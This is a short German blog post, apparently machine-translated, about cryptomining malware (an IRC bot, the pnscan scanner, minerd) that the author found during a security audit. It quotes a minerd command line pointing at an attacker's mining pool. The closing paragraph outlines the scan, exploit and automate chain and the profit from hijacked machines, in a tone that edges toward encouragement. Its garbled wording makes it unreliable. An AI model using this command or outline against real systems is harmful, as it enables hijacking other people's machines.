in Uncategorized

Es ist besser, Ihr System zu sichern! Ihr Computer kann eine Kryptowährung kicken

at

Unabhängig davon, ob Sie Linux oder Windows verwenden, sollten Sie sich um die Updates und die ordnungsgemäße Konfiguration Ihrer Dienste kümmern. Vor kurzem stieß ich bei einem Sicherheits-Audit auf Prozesse wie: scsl.pyo, pnscan.c und minerd.

Das erste Programm ist (wie sich nach der Dekompilierung herausgestellt hat) ein IRC-Client, der Hacker-Befehle ausführt (normalerweise DOS- und DDOS-Angriffe).

Der zweite ist ein Multithread-Port-Scanner (vielleicht gibt es nicht so viele Möglichkeiten wie Nmap, aber es ist viel schneller). Ein solcher Harvester ermöglicht die Erkennung vieler potenziell gefährdeter Maschinen, die Bagger der Kryptowährung sein können. Das Funktionsprinzip ist einfach: pnscan durchsucht die Netzwerkbereiche (CIDR) an Port 80 und / oder 8080 auf der Suche nach bestimmten Diensten, die beispielsweise noch nicht (oder nie) konfiguriert wurden. Dann wird ein Exploit aufgerufen, der die Steuerung der Maschine schnell und vollständig übernimmt. Zum Zeitpunkt der Übernahme der Kontrolle wird der Bergbaudienst der Bergleute hochgeladen. Interessanterweise wurden in den meisten Fällen Signale an den offiziellen Hacker-Vertreter weitergeleitet:

./minerd32 -B -o stratum + tcp: //hecks.ddosdev.com: 3334 -u ilovebigdongs.1 -p x

Ein beliebter Vorteil des Zimbra Groupware-Systems war in letzter Zeit ein beliebter Weg, um auf einen entfernten Computer zuzugreifen. Für die interessantesten Angriffe, die ich beschrieben habe, ist kein hochentwickeltes Wissen über Hacker erforderlich. Sie müssen nur wissen, welche Dienste gefährdet sind. Schreiben Sie ein kurzes Skript zum Scannen oder verwenden Sie ein vorhandenes und wenden Sie einen Exploit auf einem Remote-Computer an. Mit etwas List kann der gesamte Prozess automatisiert werden, um die Hände frei zu haben. Ab jetzt reicht es nur noch zu treten. Die Gewinne aus 1500 entfernten Maschinen belaufen sich auf etwa 3000 PLN pro Monat. Denken Sie jedoch daran, dass Sie sich ohne entsprechende Weiterleitungen nicht bewegen dürfen!

Share:

deutschehacki69

Leave A Comment

Your email address will not be published. Required fields are marked *